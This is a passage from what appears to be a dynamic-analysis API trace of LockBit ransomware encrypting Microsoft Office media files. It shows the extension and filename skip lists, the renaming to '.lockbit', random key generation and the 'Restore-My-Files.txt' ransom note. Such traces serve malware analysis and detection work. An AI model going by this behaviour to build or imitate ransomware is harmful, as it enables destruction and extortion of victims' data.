Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18207_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.189] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.189] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.204] free (_Block=0x1fa2ed8) [0200.204] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18207_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.204] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.204] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.204] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f714100, ftCreationTime.dwHighDateTime=0x1bdcf1f, ftLastAccessTime.dwLowDateTime=0xbcbd9a60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4f714100, ftLastWriteTime.dwHighDateTime=0x1bdcf1f, nFileSizeHigh=0x0, nFileSizeLow=0x1b28, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18208_.WMF", cAlternateFileName="")) returned 1 [0200.204] lstrcmpiW (lpString1=".", lpString2="BD18208_.WMF") returned -1 [0200.204] lstrcmpiW (lpString1="..", lpString2="BD18208_.WMF") returned -1 [0200.204] PathFindExtensionW (pszPath="BD18208_.WMF") returned=".WMF" [0200.204] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.204] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.204] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.204] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.204] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.204] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.205] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.205] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18208_.WMF") returned 1 [0200.206] lstrcmpiW (lpString1="ntldr", lpString2="BD18208_.WMF") returned 1 [0200.206] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18208_.WMF") returned 1 [0200.206] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18208_.WMF") returned 1 [0200.206] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18208_.WMF") returned -1 [0200.206] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18208_.WMF") returned 1 [0200.206] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18208_.WMF") returned 1 [0200.206] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.206] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18208_.WMF") returned=".WMF" [0200.206] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.206] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.206] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.207] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.207] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18208_.WMF.lockbit") returned 79 [0200.207] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18208_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18208_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0200.208] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.208] malloc (_Size=0x40068) returned 0x3df0008 [0200.208] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6952) returned 1 [0200.208] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0200.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0200.209] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0200.213] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18208_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18208_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.213] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.213] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.214] free (_Block=0x1fa2ed8) [0200.214] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18208_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.214] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.214] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.214] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96603600, ftCreationTime.dwHighDateTime=0x1bdcf21, ftLastAccessTime.dwLowDateTime=0xbcbd9a60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x96603600, ftLastWriteTime.dwHighDateTime=0x1bdcf21, nFileSizeHigh=0x0, nFileSizeLow=0xc6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18209_.WMF", cAlternateFileName="")) returned 1 [0200.214] lstrcmpiW (lpString1=".", lpString2="BD18209_.WMF") returned -1 [0200.214] lstrcmpiW (lpString1="..", lpString2="BD18209_.WMF") returned -1 [0200.215] PathFindExtensionW (pszPath="BD18209_.WMF") returned=".WMF" [0200.215] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.215] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.216] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.216] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18209_.WMF") returned 1 [0200.217] lstrcmpiW (lpString1="ntldr", lpString2="BD18209_.WMF") returned 1 [0200.217] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18209_.WMF") returned 1 [0200.217] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18209_.WMF") returned 1 [0200.217] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18209_.WMF") returned -1 [0200.217] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18209_.WMF") returned 1 [0200.217] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18209_.WMF") returned 1 [0200.217] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.217] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18209_.WMF") returned=".WMF" [0200.217] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.217] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.217] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.218] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.218] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.218] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.218] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18209_.WMF.lockbit") returned 79 [0200.218] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18209_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18209_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0200.221] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.221] malloc (_Size=0x40068) returned 0x1ff1e60 [0200.221] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3182) returned 1 [0200.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0200.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0200.222] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0200.245] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18209_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18209_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.245] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.245] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.247] free (_Block=0x1fa2ed8) [0200.247] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18209_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.247] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.247] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.247] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28673f00, ftCreationTime.dwHighDateTime=0x1bdcf20, ftLastAccessTime.dwLowDateTime=0xbcbd9a60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x28673f00, ftLastWriteTime.dwHighDateTime=0x1bdcf20, nFileSizeHigh=0x0, nFileSizeLow=0xc4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18210_.WMF", cAlternateFileName="")) returned 1 [0200.247] lstrcmpiW (lpString1=".", lpString2="BD18210_.WMF") returned -1 [0200.247] lstrcmpiW (lpString1="..", lpString2="BD18210_.WMF") returned -1 [0200.247] PathFindExtensionW (pszPath="BD18210_.WMF") returned=".WMF" [0200.247] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.247] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.248] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.248] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18210_.WMF") returned 1 [0200.249] lstrcmpiW (lpString1="ntldr", lpString2="BD18210_.WMF") returned 1 [0200.249] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18210_.WMF") returned 1 [0200.249] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18210_.WMF") returned 1 [0200.249] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18210_.WMF") returned -1 [0200.249] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18210_.WMF") returned 1 [0200.249] lstrcmpiW (lpString1="iconcache.db", 